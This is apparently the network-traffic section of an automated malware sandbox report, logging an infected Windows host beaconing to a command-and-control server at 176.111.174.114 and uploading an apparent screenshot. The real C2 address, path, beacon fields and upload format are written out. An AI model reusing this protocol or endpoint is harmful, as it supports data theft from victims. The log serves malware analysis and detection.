                                                                                                                                          Data Ascii: eJkI)\[5(/y^UM"RG~W+5i8$546zM"iyNR0'j^THSh~+GKDLU1sl_J6/KQaex{]vc?izVzuWj;f}jz~3#mn;{Ql-*e
                                                                                                                                          Apr 28, 2021 23:00:33.172113895 CEST12644OUTData Raw: dd b2 5c c1 20 0f 04 92 5b 4b 14 c1 1c 06 d9 2a 31 00 32 93 e3 5f f0 9c 7c 4d 1f 0b 9f e0 62 7c 56 f1 30 f0 34 9a bf f6 ac 9e 0b 1a ed c7 f6 53 5f ec 09 f6 b3 69 bf c9 33 6d 01 7c cd 9b b0 31 9c 56 35 96 95 65 a7 92 6d a2 c1 3d ea e3 94 e2 e7 98
                                                                                                                                          Data Ascii: \ [K*12_|Mb|V04S_i3m|1V5em=9$je5\zI]yMJJ%ed(~wS#x2~'kk)uI4J$k}sx]MV70Q]~N[<|u
                                                                                                                                          Apr 28, 2021 23:00:33.263833046 CEST12648OUTData Raw: cf e6 5e 9c f1 56 25 d3 a5 85 80 09 9c 74 15 ea 65 b9 46 2b 01 5a ac e7 3b a9 b6 d2 e8 9b 94 a4 ff 00 f4 a5 1d 2d a4 57 5b b7 e5 e3 b3 4c 2e 36 95 38 42 3a c5 5a ef 76 94 63 15 eb f0 f3 36 fe d4 a5 b2 b2 55 e9 b1 f7 a9 9a de 6e a5 29 16 37 cf dc
                                                                                                                                          Data Ascii: ^V%teF+Z;-W[L.68B:Zvc6Un)7[yTZ?Z>\rJTMt}^S.a?H*Ty;rAOXjjXB*~etrs]P7JY#o:`3"U&9/)<9/SRy^h#
                                                                                                                                          Apr 28, 2021 23:00:33.263870955 CEST12650OUTData Raw: ee 51 ac 64 45 72 eb 2c 48 01 2e ac 31 87 3d bd 39 a3 01 97 d6 cc 31 70 c3 d2 f8 a4 ec af a0 f1 f8 ea 19 6e 0e 78 aa df 04 15 dd b5 38 08 bf ad 39 3e f5 7d 4f ff 00 0c 3f f0 9f fe 86 1f 11 7f e0 5c 1f fc 66 81 fb 10 7c 28 5e 9e 20 f1 0f fe 05 c1
                                                                                                                                          Data Ascii: QdEr,H.1=91pnx89>}O?\f|(^ kq>3"O4|E}J?b?#c!?#R?>?e_>W;W_`kg_"M<7j>+9AqeIk(
                                                                                                                                          Apr 28, 2021 23:00:33.264818907 CEST12653OUTData Raw: a7 09 3d 0d fd 36 5e 80 57 f2 c3 ff 00 05 0e 55 5f db fb e3 9a a2 80 07 c6 1f 13 00 00 e0 0f ed 5b 9a fe a5 74 a9 72 06 6b f9 6a ff 00 82 87 73 fb 7f 7c 72 3f f5 58 7c 4d ff 00 a7 5b 9a fd bb e8 f1 2b e6 f8 df fa f7 1f fd 28 fc f3 c4 c5 6c 1d 0f
                                                                                                                                          Data Ascii: =6^WU_[trkjs|r?X|M[+(l?ruIz?HD-v3q_i_5]_H,0UEI$x<FT{ygnp=OUj"'RXiPrcmxH
                                                                                                                                          Apr 28, 2021 23:00:33.264888048 CEST12671OUTData Raw: 62 e1 7d 54 d7 e6 bf 51 f0 7b ea 4a b7 d6 71 3c f6 f8 3d de 6b f6 bf b3 e4 f9 f3 58 fd 2b eb de 30 fd 75 d1 fa b6 1b 91 3f 8f de e5 b7 7b 7b 5e 7f 97 2d cf 86 7f e0 af 5f b4 a7 c1 af da a7 f6 a6 b2 f8 95 f0 33 c5 6f ac e8 d0 f8 3e d2 c6 4b b7 d3
                                                                                                                                          Data Ascii: b}TQ{Jq<=kX+0u?{{^-_3o>K"tvN,ss_'m;(E{5xqNq_Wx"n+7d%#&1RWINNft]x?Xvb:)W^zjsKCjr


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          517192.168.2.450061176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:33.112050056 CEST12617OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          518176.111.174.11480192.168.2.450061C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:33.208590031 CEST12645INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:33 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          519192.168.2.450062176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:33.413007021 CEST12805OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          52192.168.2.449774176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:18.865421057 CEST4547OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          520176.111.174.11480192.168.2.450062C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:33.516582012 CEST12832INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:33 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          521176.111.174.11480192.168.2.450060C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:33.550051928 CEST12833INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:33 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 0
                                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: text/html; charset=UTF-8


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          522192.168.2.450063176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:33.727392912 CEST12834OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          523176.111.174.11480192.168.2.450063C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:33.829791069 CEST12834INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:33 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          524192.168.2.450065176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:34.037985086 CEST12835OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          525176.111.174.11480192.168.2.450065C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:34.136025906 CEST12835INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:34 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          526192.168.2.450066176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:34.357188940 CEST12836OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          527176.111.174.11480192.168.2.450066C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:34.462151051 CEST12836INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:34 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          528192.168.2.450067176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:34.678877115 CEST12837OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          529176.111.174.11480192.168.2.450067C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:34.776732922 CEST12837INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:34 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          53176.111.174.11480192.168.2.449774C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:18.968127966 CEST4547INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:18 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          530192.168.2.450069176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:34.994765043 CEST12838OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          531176.111.174.11480192.168.2.450069C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:35.095984936 CEST12839INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:35 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          532192.168.2.450070176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:35.305525064 CEST12839OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          533176.111.174.11480192.168.2.450070C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:35.405298948 CEST12840INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:35 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          534192.168.2.450071176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:35.618347883 CEST12840OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          535176.111.174.11480192.168.2.450071C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:35.720084906 CEST12841INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:35 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          536192.168.2.450072176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:35.934020042 CEST12841OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          537176.111.174.11480192.168.2.450072C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:36.035695076 CEST12842INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:36 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          538192.168.2.450073176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:36.253153086 CEST12855OUTPOST //Hnq8vS/index.php?scr=up HTTP/1.1
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          User-Agent: Uploador
                                                                                                                                          Content-Type: multipart/form-data; boundary=152138533219.jpg
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Length: 227171
                                                                                                                                          Data Raw: 2d 2d 31 35 32 31 33 38 35 33 33 32 31 39 2e 6a 70 67 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 31 35 32 31 33 38 35 33 33 32 31 39 2e 6a 70 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 02 01 01 01 01 01 02 01 01 01 02 02 02 02 02 04 03 02 02 02 02 05 04 04 03 04 06 05 06 06 06 05 06 06 06 07 09 08 06 07 09 07 06 06 08 0b 08 09 0a 0a 0a 0a 0a 06 08 0b 0c 0b 0a 0c 09 0a 0a 0a ff db 00 43 01 02 02 02 02 02 02 05 03 03 05 0a 07 06 07 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e1 e2 e3 e4 e5 e6 e7 e8 e9 ea f1 f2 f3 f4 f5 f6 f7 f8 f9 fa ff c4 00 1f 01 00 03 01 01 01 01 01 01 01 01 01 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 11 00 02 01 02 04 04 03 04 07 05 04 04 00 01 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 fc 50 8a 2f 2e 9f 52 fd 8f 77 5c d2 ec 35 fa 5c 69 9f 07 ce 47 1f 7a 75 7b 17 c1 af d8 53 f6 86 f8 d3 e1 3b 2f 89 1a 56 81 65 a2 f8 4f 50 9e 48 ad 3c 51 e2 2b f5 b7 b5 99 a3 72 92 18 91 43 4f 70 15 c1 56 30 c5 26 d2 08 38 22 bd df e1 ff 00 fc 13 93 e0 87 85 f6 5d 7c 4a f1 de b3 e2 bb c5 5c b5 9e 91 12 e9 b6 28 e0 f4 f3 1c 49 35 c4 67 d9 6d 9f e9 58 d5 c4 e1 e9 68 e5 af 91 ac 28 56 a8 ae 96 87 c5 29 f7 6a c2 7d da fd 19 bd fd 87 ff 00 63 8f 1a 78 7f ec 6f f0 5a 7f 0f c8 cd 95 d4 7c 2f e2 7b e5 b8 07 8c 03 f6 e9 2e a2 2b ea 3c 